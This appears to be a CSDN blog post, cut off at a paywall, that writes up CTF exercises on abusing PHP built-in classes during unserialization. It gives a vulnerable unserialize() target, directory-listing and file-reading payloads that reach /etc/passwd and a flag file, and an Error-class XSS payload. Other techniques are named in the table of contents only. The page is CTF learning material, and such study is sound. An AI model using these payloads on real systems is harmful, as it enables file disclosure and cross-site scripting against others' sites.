PHP 原生类学习与利用

已于 2022-09-22 17:06:16 修改
阅读量1.4k 收藏 4
点赞数 1
分类专栏: PHP安全 文章标签: php 安全 网络安全 web安全
于 2022-09-22 17:05:51 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/snowlyzz/article/details/126973896
版权
本文详细介绍了PHP原生类在安全领域的应用,包括利用DirectoryIterator、FilesystemIterator等进行文件操作,Error和Exception类进行XSS攻击,SoapClient类实现SSRF,以及SimpleXMLElement类进行XXE攻击。文章通过多个CTF挑战实例,阐述了如何利用这些类进行安全漏洞的利用和防御。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

目录​​​​​​​

前言:

ez_serialize

PHP原生文件操作类:

可遍历目录类:

DirectoryIterator

 FilesystemIterator

GlobIterator : 

可读取文件类:

SplFileObject 类

利用Error/Exception 内置类进行XSS

Error 

Excepthin 内置类。

[BJDCTF 2nd]xss之光

使用 Error/Exception 内置类绕过hash 比较。

Error类

Exception类

[2020 极客大挑战]Greatphp

SoapClient类来进行SSRF

bestphp’s revenge

使用 SimpleXMLElement 类进行 XXE

[SUCTF 2018]Homework

使用 ZipArchive 类来删除文件

梦里花开牡丹亭

前言:

对PHP 原生类的利用似懂非懂,总是看完wp 才恍然大悟,原来可以这么用, 所以收集总结一下 我涉及到的php 原生类的题目,加深巩固。

ez_serialize

<?php
error_reporting(0);
highlight_file(__FILE__);
class A{
    public $class;
    public $para;
    public $check;
    public function __construct()
    {
        $this->class = "B";
        $this->para = "ctf";
        echo new  $this->class($this->para);
    }
    public function __wakeup()
    {
        $this->check = new C;
        if($this->check->vaild($this->para) && $this->check->vaild($this->class)) {
            echo new  $this->class($this->para);
        }
        else
            die('bad hacker~');
    }
    

}

class B{
    var $a;
    public function __construct($a)
    {
        $this->a = $a;
        echo ("hello ".$this->a);
    }
    
}

class C{

    function vaild($code){
        $pattern = '/[!|@|#|$|%|^|&|*|=|\'|"|:|;|?]/i';
        if (preg_match($pattern, $code)){
            return false;
        }
        else
            return true;
    }
    
}

if(isset($_GET['pop']))
{
    unserialize($_GET['pop']);
}
else
{
    $a=new A;
} 
?>

这是一道很经典的题, 做过好多类似的,简单审计一下吧。

先反序列化了pop 传入的值,然后我们全局查找一下出口,也就是我们能利用的点,一般都是file_put_contents   file_get_contents   system  eval 什么的,但是这里没有。审计了一会后,能利用的也就这些地方了

    public function __wakeup()
    {
        $this->check = new C;
        if($this->check->vaild($this->para) && $this->check->vaild($this->class)) {
            echo new  $this->class($this->para);
        }
        else
            die('bad hacker~');
    }

这里 echo 了一个 类对象,那么不就是触发了 __toString 方法了嘛,不由得想到 使用php原生文件操作类。

PHP原生文件操作类:

这里提出 4个类,可以对文件进行操作的类:

可遍历目录类:

DirectoryIterator

FilesystemIterator

GlobIterator与上面略不同,该类可以通过模式匹配来寻找文件路径。

遍历目录 用以上哪个类都行,最好搭配glob:///协议去模式匹配来寻找我们想要文件的路径。

例如:

DirectoryIterator

<?php
$dir = $_GET['cmd'];
$a = new DirectoryIterator($dir);
foreach($a as $f){
    echo($f->__toString().'<br>');// 不加__toString()也可,因为echo可以自动调用
}
?>
其中cmd=glob:///*

# payload一句话的形式:
$a = new DirectoryIterator("glob:///*");foreach($a as $f){echo($f->__toString().'<br>');}

 FilesystemIterator

<?php
$dir = $_GET['whoami'];
$a = new FilesystemIterator($dir);
foreach($a as $f){
    echo($f->__toString().'<br>');// 不加__toString()也可,因为echo可以自动调用
}
?>
其中cmd=glob:///*

# payload一句话的形式:
$a = new FilesystemIterator("glob:///*");foreach($a as $f){echo($f->__toString().'<br>');}

GlobIterator : 

<?php
$dir = $_GET['whoami'];
$a = new GlobIterator($dir);
foreach($a as $f){
    echo($f->__toString().'<br>');// 不加__toString()也可,因为echo可以自动调用
}
?>
其中cmd=/*

# payload一句话的形式:
$a = new FilesystemIterator("/*");foreach($a as $f){echo($f->__toString().'<br>');}

也可以从此代码绕过 open_basedir ,其原理不再赘述

可读取文件类:

SplFileObject 类

SplFileObject在此函数中,URL 可作为文件名,不过也要受到影响。allow_url_fopen

SplFileInfo 类为单个文件的信息,提供了一个高级对象的接口,可以用于对文件的内容 遍历,查找,操作。

测试:

读取文件的一行

<?php
$context = new SplFileObject('/etc/passwd');
echo $context;

对文件中的每一行内容进行遍历。

<?php
$context = new SplFileObject('/etc/passwd');
foreach($context as $f){
    echo($f);
}

这道题可以先使用 FilesystemIterator 类来列举 flag 的位置,如:

<?php
class A{
    public $class='DirectoryIterator';
    public $para="/var/www/html";
    public $check;
    }
$a  = new A();
echo serialize($a);

看到

 往payload 追加 目录,可以看到里面有个flag.php

然后我们使用文件读取类 操作就可以了:

<?php
class A{
    public $class='SplFileObject';
    public $para="/var/www/html/aMaz1ng_y0u_c0Uld_f1nd_F1Ag_hErE/flag.php";
    public $check;
    }

$a  = new A();
echo serialize($a);

利用Error/Exception 内置类进行XSS

Error 

使用条件:

  • 适用于php7的版本
  • 在开启报错的情况下

Error类是php 的一个内置类,用于自动自定义一个Error ,在php7的情况下可能会造成一个xss漏洞,因为他内置有一个 __toString() 方法,常用于php反序列化中,如果 有个pop链走到一半走不通了,可以尝试利用这个来做一个xss,直接利用xss来打, 很多cms会选择使用 echo <obejet>类的写法,这回触发__toString 方法。利用这个类调用__toString 也会有意想不到的操作。

本地测试代码:

<?php

$a = unserialize($_GET['cmd']);
echo $a;

这里 有个反序列化的操作,但是没有后续操作,只能用PHP原生类进行操作。

exp:

<?php

$a = new Error("<script>alert('1')</script>");
$b = serialize($a);
echo urlencode($b);

传入cmd

最低0.47元/天 解锁文章
php原生类的总结
unexpectedthing的博客
12-12 6148
文章目录前言利用Error/Exception 内置进行 XSSError内置Exception内置[BJDCTF 2nd]xss之光使用 Error/Exception 内置绕过哈希比较ErrorException [2020 极客大挑战]GreatphpSoapClient来进行SSRF 前言 之所以这个总结,极客大挑战的SoEzunser考到了php原生类来遍历目录 其实,在CTF题目中,可以利用php原生类来进行XSS,反序列化,SSRF,XXE和读文件的思路 通过遍历看一下php的内
原生小说App开发:基于PHP原生前端的高效解决方案
最新发布
04-20
内容概要:本文详细介绍了原生小说阅读应用程序的完整源码包,涵盖从前端原生开发(Android...其他说明:该系统不仅可以直接用于商业运营,还可以作为学习和研究的对象,帮助开发者深入了解原生开发的优势和技术细节。
PHP原生类利用
XINO
05-04 1735
原生类,即php中的内置,ctf考过利用原生类的考点 先贴一个脚本寻找php中存在什么原生类 <?php $classes = get_declared_classes(); foreach ($classes as $class) { $methods = get_class_methods($class); foreach ($methods as $method) { if (in_array($method, array( '__de
攻防世界-file_include
weixin_71036000的博客
03-11 197
发现不能使用php://,应该是过滤了base64-encode或者是php://,这是可以给base64-encode进行两次url编码进行绕过。在一开始包含了以个check.php是验证规则,来验证你传递的是不是合法的,这是可以看看能不能正常包含文件。可以发现能够正常包含,这是可以利用php://协议进行包含。这时候发现能回显,然后解码看看过滤了什么。发现过滤了base、encode。这时候直接可以读取flag。
PHP原生类总结利用
qq_44640313的博客
11-13 2669
PHP原生类总结及例题
php原生类使用
weixin_44944193的博客
11-07 8675
就是用{}包着的 对象也可以说是函数, 一个大包着多个对象(函数) 看列子: <?php //声明的方法,我们用class来声明我们的. // class 名 { 的内容 } // 注:这里的$this是值当前的 class test{ var $a; var $b = "111"; var $c = "我是c"; functi...
原生php登录增删改查
05-27
本文将详细讨论“原生PHP登录增删改查”这一主题,帮助你深入理解如何利用PHP实现用户登录系统以及数据库操作的基本功能。 一、原生PHP登录系统 1. 用户验证:登录系统的核心是验证用户的用户名和密码。原生PHP中,...
PHP原生DOM对象操作XML.pdf
09-30
在本文件中,我们将学习如何使用PHP的原生DOM对象来创建、操作XML文档。原生DOM对象指的是PHP标准库中提供的用于解析和操作XML的DOMDocument和相关。 首先,创建一个DOMDocument对象,并设置文档型为XML。...
基于原生php和bootstrap实现的简单留言板.zip
06-01
通过这个项目,学生不仅可以学习PHP和MySQL的基础,还能了解如何利用Bootstrap创建现代的、响应式的用户界面,以及如何处理用户输入和确保Web应用的安全性。同时,这也是实践项目管理、版本控制和文档编写等软技能...
PHP反序列化原生类利用
Sentiment的博客
05-10 1964
前言 之前对反序列化原生类进行过总结,但可能总结的方面不同,在ctf用到的很少,所以这里在对ctf常用原生类进行一次总结。 原生类 php中内置很多原生的,在CTF中常以echo new $a($b);这种形式出现,当看到这种关键字眼时,就要考虑本题是不是需要原生类利用了。 先看下都有什么内置原生类 <?php $classes = get_declared_classes(); foreach ($classes as $class) { $methods = get_class_meth
php 连接mysql原生类
10-31
支持多个版本mysql数据库,通过配置文件连接,集成化,模块化
PHP 原生类利用
cjdgg的博客
04-20 3691
DASCTF做题学习-反序列化&SSTIez_serialize ez_serialize 这题直接给出了源代码,源代码也都挺简单的 <?php error_reporting(0); highlight_file(__FILE__); class A{ public $class; public $para; public $check; public function __construct() { $this->class
PHP原生类详解
qq_71467825的博客
06-21 1233
什么是php原生类PHP 原生类指的是 PHP 内置的,它们可以直接在 PHP 代码中使用且无需安装或导入任何库。以下是一些常用的 PHP 原生类:1. DateTime :用于处理日期和时间,支持各种格式和时间区域。2. PDO :用于访问和操作关系型数据库,如 MySQL、PostgreSQL 等。3. FilesystemIterator :用于迭代文件系统目录,支持过滤器和递归。4. DOMDocument :用于创建和操作 XML 文档,支持 XPath 查询和转换。
PHP原生类及其利用
Elite的博客
03-23 676
简单易懂的PHP原生类及其利用讲解
php原生类,【翻译自nikic大神】PHP原生类型的方法
weixin_42537919的博客
03-09 244
引言第一次,翻译别人的文章,用四级英语的水平来翻译~~囧,可能有很多不太恰当的地方,尽管拍砖(有些地方实在想不到恰当的翻译,我同时贴出了原文和自己很low的翻译)。翻译这篇文章用了我3个晚上一个中午~,先弄明白技术上大体再说什么,然后在翻译的~这样做的目的一方面锻炼下自己的英文,一方面学习点国外的比较新的技术想法。这篇文章主要讲了对PHP中的原生类型实现面向对象的操作,通过扩展的方式实现,用来解决...
PHP原生类
qq_63928796的博客
11-09 1311
原生类就是php内置,不用定义php自带的,即不需要在当前脚本写出,但也可以实例化的我们可以通过脚本找一下php原生类
反序列化之PHP原生类利用
weixin_30678821的博客
06-26 366
目录 基础知识 __call SoapClient __toString Error Exception 实例化任意 正文 文章围绕着一个问题,如果在代码审计中有反序列化点,但是在原本的代码中找不到pop链该如何? N1CTF有一个无pop链的反序列化的题目,其中就是找到php内置来进行反序列化。 回到顶部 基础知识 首先...
原生PHP开发的WMS系统多种技术整合实践
5. 云计算大数据: 这里提到的云计算平台、大数据分析、人工智能和机器学习等,代表了现代信息技术的前沿领域,涉及数据集的管理和分析,以及基于互联网的计算资源的利用和信息的共享。 标签所蕴含的知识点: 1. ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值